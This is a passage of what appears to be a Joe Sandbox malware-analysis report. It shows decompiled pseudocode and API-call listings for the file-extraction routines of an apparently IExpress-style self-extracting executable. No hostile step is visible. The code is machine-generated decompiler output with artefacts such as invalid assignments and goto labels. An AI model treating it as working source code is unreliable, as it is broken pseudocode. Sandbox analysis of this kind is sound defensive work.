                                                                      							_t33 = _t30 | 0xffffffff;
                                                                      							goto L35;
                                                                      						}
                                                                      						_t69 = 0x11d91e4;
                                                                      						_t30 = E011D4702( &_v268, 0x11d91e4,  *(_t75 + 4));
                                                                      						__eflags = _t30;
                                                                      						if(__eflags == 0) {
                                                                      							goto L3;
                                                                      						}
                                                                      						_t41 = E011D476D( &_v268, __eflags);
                                                                      						__eflags = _t41;
                                                                      						if(_t41 == 0) {
                                                                      							goto L9;
                                                                      						}
                                                                      						_push(0x180);
                                                                      						_t30 = E011D4980( &_v268, 0x8302); // executed
                                                                      						_t75 = _t30;
                                                                      						__eflags = _t75 - 0xffffffff;
                                                                      						if(_t75 == 0xffffffff) {
                                                                      							goto L3;
                                                                      						}
                                                                      						_t30 = E011D47E0( &_v268);
                                                                      						__eflags = _t30;
                                                                      						if(_t30 == 0) {
                                                                      							goto L3;
                                                                      						}
                                                                      						 *0x11d93f4 =  *0x11d93f4 + 1;
                                                                      						_t33 = _t75;
                                                                      						goto L35;
                                                                      					}
                                                                      					_t44 = _t36 - 1;
                                                                      					__eflags = _t44;
                                                                      					if(_t44 == 0) {
                                                                      						_t54 = 0x11d91e4;
                                                                      						_t63 = 0x11d91e4;
                                                                      						do {
                                                                      							_t45 =  *_t63;
                                                                      							_t63 =  &(_t63[1]);
                                                                      							__eflags = _t45;
                                                                      						} while (_t45 != 0);
                                                                      						_t74 =  *(_t75 + 4);
                                                                      						_t64 = _t63 - 0x11d91e5;
                                                                      						__eflags = _t64;
                                                                      						_t69 =  &(_t74[1]);
                                                                      						do {
                                                                      							_t46 =  *_t74;
                                                                      							_t74 =  &(_t74[1]);
                                                                      							__eflags = _t46;
                                                                      						} while (_t46 != 0);
                                                                      						_t73 = _t74 - _t69;
                                                                      						_t30 = _t64 + 1 + _t74 - _t69;
                                                                      						__eflags = _t30 - 0x104;
                                                                      						if(_t30 >= 0x104) {
                                                                      							goto L3;
                                                                      						}
                                                                      						_t69 = 0x11d91e4;
                                                                      						_t30 = E011D4702( &_v268, 0x11d91e4,  *(_t75 + 4));
                                                                      						__eflags = _t30;
                                                                      						if(_t30 == 0) {
                                                                      							goto L3;
                                                                      						}
                                                                      						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                      						_t30 = E011D4C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                      						__eflags = _t30;
                                                                      						if(_t30 == 0) {
                                                                      							goto L3;
                                                                      						}
                                                                      						E011D4B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                      						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                      						__eflags = _t50;
                                                                      						if(_t50 != 0) {
                                                                      							_t51 = _t50 & 0x00000027;
                                                                      							__eflags = _t51;
                                                                      						} else {
                                                                      							_t51 = 0x80;
                                                                      						}
                                                                      						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                      						__eflags = _t30;
                                                                      						if(_t30 == 0) {
                                                                      							goto L3;
                                                                      						} else {
                                                                      							_t33 = 1;
                                                                      							goto L35;
                                                                      						}
                                                                      					}
                                                                      					_t30 = _t44 - 1;
                                                                      					__eflags = _t30;
                                                                      					if(_t30 == 0) {
                                                                      						goto L3;
                                                                      					}
                                                                      					goto L9;
                                                                      				}
                                                                      				if(_a4 == 3) {
                                                                      					_t30 = E011D4B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                      				}
                                                                      				goto L3;
                                                                      			}































                                                                      0x011d4cd0
                                                                      0x011d4cdb
                                                                      0x011d4ce0
                                                                      0x011d4ce2
                                                                      0x011d4cee
                                                                      0x011d4cf2
                                                                      0x011d4d0e
                                                                      0x011d4d0e
                                                                      0x011d4d11
                                                                      0x011d4e83
                                                                      0x011d4e88
                                                                      0x011d4e98
                                                                      0x011d4e98
                                                                      0x011d4d17
                                                                      0x011d4d17
                                                                      0x011d4d1a
                                                                      0x011d4d2f
                                                                      0x011d4d2f
                                                                      0x00000000
                                                                      0x011d4d2f
                                                                      0x011d4d1c
                                                                      0x011d4d1c
                                                                      0x011d4d1f
                                                                      0x011d4dcb
                                                                      0x011d4dd0
                                                                      0x011d4dd2
                                                                      0x011d4ddd
                                                                      0x011d4ddd
                                                                      0x011d4de3
                                                                      0x011d4de8
                                                                      0x011d4ded
                                                                      0x011d4ded
                                                                      0x011d4def
                                                                      0x011d4df0
                                                                      0x011d4df0
                                                                      0x011d4df4
                                                                      0x011d4df4
                                                                      0x011d4df6
                                                                      0x011d4df9
                                                                      0x011d4dfc
                                                                      0x011d4dfc
                                                                      0x011d4dfe
                                                                      0x011d4dff
                                                                      0x011d4dff
                                                                      0x011d4e03
                                                                      0x011d4e08
                                                                      0x011d4e0a
                                                                      0x011d4e0f
                                                                      0x011d4d03
                                                                      0x011d4d03
                                                                      0x00000000
                                                                      0x011d4d03
                                                                      0x011d4e18
                                                                      0x011d4e20
                                                                      0x011d4e25
                                                                      0x011d4e27
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d4e33
                                                                      0x011d4e38
                                                                      0x011d4e3a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d4e40
                                                                      0x011d4e51
                                                                      0x011d4e56
                                                                      0x011d4e5b
                                                                      0x011d4e5e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d4e6a
                                                                      0x011d4e6f
                                                                      0x011d4e71
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d4e77
                                                                      0x011d4e7d
                                                                      0x00000000
                                                                      0x011d4e7d
                                                                      0x011d4d25
                                                                      0x011d4d25
                                                                      0x011d4d28
                                                                      0x011d4d36
                                                                      0x011d4d3b
                                                                      0x011d4d40
                                                                      0x011d4d40
                                                                      0x011d4d42
                                                                      0x011d4d43
                                                                      0x011d4d43
                                                                      0x011d4d47
                                                                      0x011d4d4a
                                                                      0x011d4d4a
                                                                      0x011d4d4c
                                                                      0x011d4d4f
                                                                      0x011d4d4f
                                                                      0x011d4d51
                                                                      0x011d4d52
                                                                      0x011d4d52
                                                                      0x011d4d56
                                                                      0x011d4d5b
                                                                      0x011d4d5d
                                                                      0x011d4d62
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d4d67
                                                                      0x011d4d6f
                                                                      0x011d4d74
                                                                      0x011d4d76
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d4d7c
                                                                      0x011d4d84
                                                                      0x011d4d89
                                                                      0x011d4d8b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d4d94
                                                                      0x011d4d99
                                                                      0x011d4d9e
                                                                      0x011d4da1
                                                                      0x011d4daa
                                                                      0x011d4daa
                                                                      0x011d4da3
                                                                      0x011d4da3
                                                                      0x011d4da3
                                                                      0x011d4db5
                                                                      0x011d4dbb
                                                                      0x011d4dbd
                                                                      0x00000000
                                                                      0x011d4dc3
                                                                      0x011d4dc5
                                                                      0x00000000
                                                                      0x011d4dc5
                                                                      0x011d4dbd
                                                                      0x011d4d2a
                                                                      0x011d4d2a
                                                                      0x011d4d2d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d4d2d
                                                                      0x011d4cf8
                                                                      0x011d4cfd
                                                                      0x011d4d02
                                                                      0x00000000

                                                                      APIs
                                                                      • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 011D4DB5
                                                                      • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 011D4DDD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: AttributesFileItemText
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                      • API String ID: 3625706803-2312194364
                                                                      • Opcode ID: ad146f6199b8acde438dbc7c04fec724585c1446b497c015dcdee7bb248f2fe7
                                                                      • Instruction ID: dff574c4c7fde2c4e421c6212ea7b7c31eec56b94f71f327d0c1d9435df42a4a
                                                                      • Opcode Fuzzy Hash: ad146f6199b8acde438dbc7c04fec724585c1446b497c015dcdee7bb248f2fe7
                                                                      • Instruction Fuzzy Hash: 174173362049129BDB3D8F3CD8446FE77A4EF65348F048668C88297E85DB31DA8AC750
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E011D4C37(signed int __ecx, int __edx, int _a4) {
                                                                      				struct _FILETIME _v12;
                                                                      				struct _FILETIME _v20;
                                                                      				FILETIME* _t14;
                                                                      				int _t15;
                                                                      				signed int _t21;
                                                                      
                                                                      				_t21 = __ecx * 0x18;
                                                                      				if( *((intOrPtr*)(_t21 + 0x11d8d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                      					L5:
                                                                      					return 0;
                                                                      				} else {
                                                                      					_t14 =  &_v12;
                                                                      					_t15 = SetFileTime( *(_t21 + 0x11d8d74), _t14, _t14, _t14); // executed
                                                                      					if(_t15 == 0) {
                                                                      						goto L5;
                                                                      					}
                                                                      					return 1;
                                                                      				}
                                                                      			}








                                                                      0x011d4c40
                                                                      0x011d4c4a
                                                                      0x011d4c8d
                                                                      0x00000000
                                                                      0x011d4c70
                                                                      0x011d4c70
                                                                      0x011d4c7e
                                                                      0x011d4c86
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d4c8a

                                                                      APIs
                                                                      • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 011D4C54
                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 011D4C66
                                                                      • SetFileTime.KERNELBASE(?,?,?,?), ref: 011D4C7E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Time$File$DateLocal
                                                                      • String ID:
                                                                      • API String ID: 2071732420-0
                                                                      • Opcode ID: 16b97c27bf953e0f02e749095306f8fed50e75d188b9c72f5a2a794055d6e173
                                                                      • Instruction ID: aacb7545e32576914b622b558b0063a0a602b4b8a443e35125f7daf9831af323
                                                                      • Opcode Fuzzy Hash: 16b97c27bf953e0f02e749095306f8fed50e75d188b9c72f5a2a794055d6e173
                                                                      • Instruction Fuzzy Hash: AAF06D7260121DAAAB2CDEA8DC49DBF7BEDEB04250744063AA916C2890FB34D554C7A0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 75%
                                                                      			E011D487A(CHAR* __ecx, signed int __edx) {
                                                                      				void* _t7;
                                                                      				CHAR* _t11;
                                                                      				long _t18;
                                                                      				long _t23;
                                                                      
                                                                      				_t11 = __ecx;
                                                                      				asm("sbb edi, edi");
                                                                      				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                      				if((__edx & 0x00000100) == 0) {
                                                                      					asm("sbb esi, esi");
                                                                      					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                      				} else {
                                                                      					if((__edx & 0x00000400) == 0) {
                                                                      						asm("sbb esi, esi");
                                                                      						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                      					} else {
                                                                      						_t23 = 1;
                                                                      					}
                                                                      				}
                                                                      				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                      				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                      					return _t7;
                                                                      				} else {
                                                                      					E011D490C(_t11);
                                                                      					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                      				}
                                                                      			}







                                                                      0x011d4880
                                                                      0x011d488c
                                                                      0x011d4894
                                                                      0x011d48a0
                                                                      0x011d48c9
                                                                      0x011d48ce
                                                                      0x011d48a2
                                                                      0x011d48a8
                                                                      0x011d48b7
                                                                      0x011d48bc
                                                                      0x011d48aa
                                                                      0x011d48ac
                                                                      0x011d48ac
                                                                      0x011d48a8
                                                                      0x011d48de
                                                                      0x011d48e7
                                                                      0x011d490b
                                                                      0x011d48ee
                                                                      0x011d48f0
                                                                      0x00000000
                                                                      0x011d4902

                                                                      APIs
                                                                      • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,011D4A23,?,011D4F67,*MEMCAB,00008000,00000180), ref: 011D48DE
                                                                      • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,011D4F67,*MEMCAB,00008000,00000180), ref: 011D4902
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: 828804c7322019bd4820daad8c73bd808b75816d58b6254f8aa8872b0810eb1a
                                                                      • Instruction ID: e39b2d659be9b1a356d578fac3140213e2872e829e907562c5a49c123fc9ac7d
                                                                      • Opcode Fuzzy Hash: 828804c7322019bd4820daad8c73bd808b75816d58b6254f8aa8872b0810eb1a
                                                                      • Instruction Fuzzy Hash: ED016DA3E125702AF32C80799C89FB7551CCBDA675F1B0334BEEAE79C1E6644C0482E4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 93%
                                                                      			E011D4AD0(signed int _a4, void* _a8, long _a12) {
                                                                      				signed int _t9;
                                                                      				int _t12;
                                                                      				signed int _t14;
                                                                      				signed int _t15;
                                                                      				void* _t20;
                                                                      				struct HWND__* _t21;
                                                                      				signed int _t24;
                                                                      				signed int _t25;
                                                                      
                                                                      				_t20 =  *0x11d858c; // 0x270
                                                                      				_t9 = E011D3680(_t20);
                                                                      				if( *0x11d91d8 == 0) {
                                                                      					_push(_t24);
                                                                      					_t12 = WriteFile( *(0x11d8d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                      					if(_t12 != 0) {
                                                                      						_t25 = _a12;
                                                                      						if(_t25 != 0xffffffff) {
                                                                      							_t14 =  *0x11d9400; // 0x9a800
                                                                      							_t15 = _t14 + _t25;
                                                                      							 *0x11d9400 = _t15;
                                                                      							if( *0x11d8184 != 0) {
                                                                      								_t21 =  *0x11d8584; // 0x0
                                                                      								if(_t21 != 0) {
                                                                      									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x11d93f8, 0);
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					} else {
                                                                      						_t25 = _t24 | 0xffffffff;
                                                                      					}
                                                                      					return _t25;
                                                                      				} else {
                                                                      					return _t9 | 0xffffffff;
                                                                      				}
                                                                      			}











                                                                      0x011d4ad5
                                                                      0x011d4adb
                                                                      0x011d4ae7
                                                                      0x011d4aee
                                                                      0x011d4b05
                                                                      0x011d4b0d
                                                                      0x011d4b14
                                                                      0x011d4b1a
                                                                      0x011d4b1c
                                                                      0x011d4b21
                                                                      0x011d4b2a
                                                                      0x011d4b2f
                                                                      0x011d4b31
                                                                      0x011d4b39
                                                                      0x011d4b54
                                                                      0x011d4b54
                                                                      0x011d4b39
                                                                      0x011d4b2f
                                                                      0x011d4b0f
                                                                      0x011d4b0f
                                                                      0x011d4b0f
                                                                      0x011d4b5e
                                                                      0x011d4ae9
                                                                      0x011d4aed
                                                                      0x011d4aed

                                                                      APIs
                                                                        • Part of subcall function 011D3680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 011D369F
                                                                        • Part of subcall function 011D3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 011D36B2
                                                                        • Part of subcall function 011D3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 011D36DA
                                                                      • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 011D4B05
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                      • String ID:
                                                                      • API String ID: 1084409-0
                                                                      • Opcode ID: ef25c9f9e7b50f07b712cc8a3692824387b7805b46c4d80b0c3708cf261a1286
                                                                      • Instruction ID: de1a8d0779c77dfb229ebfcbf961a5a7064a42d70feef060573de9a91ca575a1
                                                                      • Opcode Fuzzy Hash: ef25c9f9e7b50f07b712cc8a3692824387b7805b46c4d80b0c3708cf261a1286
                                                                      • Instruction Fuzzy Hash: 0E01DD31203215ABD72C8F6CDC05F967B69FB54725F048235F939975D4C7709891C780
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E011D658A(char* __ecx, void* __edx, char* _a4) {
                                                                      				intOrPtr _t4;
                                                                      				char* _t6;
                                                                      				char* _t8;
                                                                      				void* _t10;
                                                                      				void* _t12;
                                                                      				char* _t16;
                                                                      				intOrPtr* _t17;
                                                                      				void* _t18;
                                                                      				char* _t19;
                                                                      
                                                                      				_t16 = __ecx;
                                                                      				_t10 = __edx;
                                                                      				_t17 = __ecx;
                                                                      				_t1 = _t17 + 1; // 0x11d8b3f
                                                                      				_t12 = _t1;
                                                                      				do {
                                                                      					_t4 =  *_t17;
                                                                      					_t17 = _t17 + 1;
                                                                      				} while (_t4 != 0);
                                                                      				_t18 = _t17 - _t12;
                                                                      				_t2 = _t18 + 1; // 0x11d8b40
                                                                      				if(_t2 < __edx) {
                                                                      					_t19 = _t18 + __ecx;
                                                                      					if(_t19 > __ecx) {
                                                                      						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                      						if( *_t8 != 0x5c) {
                                                                      							 *_t19 = 0x5c;
                                                                      							_t19 =  &(_t19[1]);
                                                                      						}
                                                                      					}
                                                                      					_t6 = _a4;
                                                                      					 *_t19 = 0;
                                                                      					while( *_t6 == 0x20) {
                                                                      						_t6 = _t6 + 1;
                                                                      					}
                                                                      					return E011D16B3(_t16, _t10, _t6);
                                                                      				}
                                                                      				return 0x8007007a;
                                                                      			}












                                                                      0x011d6592
                                                                      0x011d6594
                                                                      0x011d6596
                                                                      0x011d6598
                                                                      0x011d6598
                                                                      0x011d659b
                                                                      0x011d659b
                                                                      0x011d659d
                                                                      0x011d659e
                                                                      0x011d65a2
                                                                      0x011d65a4
                                                                      0x011d65a9
                                                                      0x011d65b2
                                                                      0x011d65b6
                                                                      0x011d65ba
                                                                      0x011d65c3
                                                                      0x011d65c5
                                                                      0x011d65c8
                                                                      0x011d65c8
                                                                      0x011d65c3
                                                                      0x011d65c9
                                                                      0x011d65cc
                                                                      0x011d65d2
                                                                      0x011d65d1
                                                                      0x011d65d1
                                                                      0x00000000
                                                                      0x011d65dc
                                                                      0x00000000

                                                                      APIs
                                                                      • CharPrevA.USER32(011D8B3E,011D8B3F,00000001,011D8B3E,-00000003,?,011D60EC,011D1140,?), ref: 011D65BA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: CharPrev
                                                                      • String ID:
                                                                      • API String ID: 122130370-0
                                                                      • Opcode ID: 5d011033d0721bf6bc385188d643ead7aae58f01fa3c3e4e5924563d36d0b160
                                                                      • Instruction ID: 51d4ede68643b8f7e41ef0d56d855900c7c6085a42b19cda4b229ee1476893a6
                                                                      • Opcode Fuzzy Hash: 5d011033d0721bf6bc385188d643ead7aae58f01fa3c3e4e5924563d36d0b160
                                                                      • Instruction Fuzzy Hash: 77F04C321042509BE33E491D9884B66BFDE9B971D0F59026EE9EAC320DCB658CC6C7A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 93%
                                                                      			E011D621E() {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				signed int _t5;
                                                                      				void* _t9;
                                                                      				void* _t13;
                                                                      				void* _t19;
                                                                      				void* _t20;
                                                                      				signed int _t21;
                                                                      
                                                                      				_t5 =  *0x11d8004; // 0xdc3102d5
                                                                      				_v8 = _t5 ^ _t21;
                                                                      				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                      					0x4f0 = 2;
                                                                      					_t9 = E011D597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                      				} else {
                                                                      					E011D44B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                      					 *0x11d9124 = E011D6285();
                                                                      					_t9 = 0;
                                                                      				}
                                                                      				return E011D6CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                      			}











                                                                      0x011d6229
                                                                      0x011d6230
                                                                      0x011d6247
                                                                      0x011d626a
                                                                      0x011d6272
                                                                      0x011d6249
                                                                      0x011d6255
                                                                      0x011d625f
                                                                      0x011d6264
                                                                      0x011d6264
                                                                      0x011d6284

                                                                      APIs
                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 011D623F
                                                                        • Part of subcall function 011D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 011D4518
                                                                        • Part of subcall function 011D44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 011D4554
                                                                        • Part of subcall function 011D6285: GetLastError.KERNEL32(011D5BBC), ref: 011D6285
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                      • String ID:
                                                                      • API String ID: 381621628-0
                                                                      • Opcode ID: 099b98250402880a373eb15a72b5dafe1abddf6c3bde16b03deb03f903ec091e
                                                                      • Instruction ID: 29b76e207318a8bc491ab7280de14f672cc2d96de826bad42accce3c005e1d14
                                                                      • Opcode Fuzzy Hash: 099b98250402880a373eb15a72b5dafe1abddf6c3bde16b03deb03f903ec091e
                                                                      • Instruction Fuzzy Hash: 46F0BEB06012096BEB68EA749D02FBA33A8DB54304F40007AA986D6081EF749984C750
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E011D4B60(signed int _a4) {
                                                                      				signed int _t9;
                                                                      				signed int _t15;
                                                                      
                                                                      				_t15 = _a4 * 0x18;
                                                                      				if( *((intOrPtr*)(_t15 + 0x11d8d64)) != 1) {
                                                                      					_t9 = FindCloseChangeNotification( *(_t15 + 0x11d8d74)); // executed
                                                                      					if(_t9 == 0) {
                                                                      						return _t9 | 0xffffffff;
                                                                      					}
                                                                      					 *((intOrPtr*)(_t15 + 0x11d8d60)) = 1;
                                                                      					return 0;
                                                                      				}
                                                                      				 *((intOrPtr*)(_t15 + 0x11d8d60)) = 1;
                                                                      				 *((intOrPtr*)(_t15 + 0x11d8d68)) = 0;
                                                                      				 *((intOrPtr*)(_t15 + 0x11d8d70)) = 0;
                                                                      				 *((intOrPtr*)(_t15 + 0x11d8d6c)) = 0;
                                                                      				return 0;
                                                                      			}





                                                                      0x011d4b66
                                                                      0x011d4b74
                                                                      0x011d4b98
                                                                      0x011d4ba0
                                                                      0x00000000
                                                                      0x011d4bac
                                                                      0x011d4ba4
                                                                      0x00000000
                                                                      0x011d4ba4
                                                                      0x011d4b78
                                                                      0x011d4b7e
                                                                      0x011d4b84
                                                                      0x011d4b8a
                                                                      0x00000000

                                                                      APIs
                                                                      • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,011D4FA1,00000000), ref: 011D4B98
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: ChangeCloseFindNotification
                                                                      • String ID:
                                                                      • API String ID: 2591292051-0
                                                                      • Opcode ID: eabebae80a0c84b102fcbc16a41090b1c9097e3d8c101e697dc2c9dca8d24a30
                                                                      • Instruction ID: 4642b23f46ef91da8bc20bdb5520bbd2e79844dcba77ff66632cdb8ba14d1e11
                                                                      • Opcode Fuzzy Hash: eabebae80a0c84b102fcbc16a41090b1c9097e3d8c101e697dc2c9dca8d24a30
                                                                      • Instruction Fuzzy Hash: DDF01C31500F0D9EC77DDE2ADC02A5FBBE6ABA5265310092ED46ED25E4E7706441CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E011D66AE(CHAR* __ecx) {
                                                                      				unsigned int _t1;
                                                                      
                                                                      				_t1 = GetFileAttributesA(__ecx); // executed
                                                                      				if(_t1 != 0xffffffff) {
                                                                      					return  !(_t1 >> 4) & 0x00000001;
                                                                      				} else {
                                                                      					return 0;
                                                                      				}
                                                                      			}




                                                                      0x011d66b1
                                                                      0x011d66ba
                                                                      0x011d66c7
                                                                      0x011d66bc
                                                                      0x011d66be
                                                                      0x011d66be

                                                                      APIs
                                                                      • GetFileAttributesA.KERNELBASE(?,011D4777,?,011D4E38,?), ref: 011D66B1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
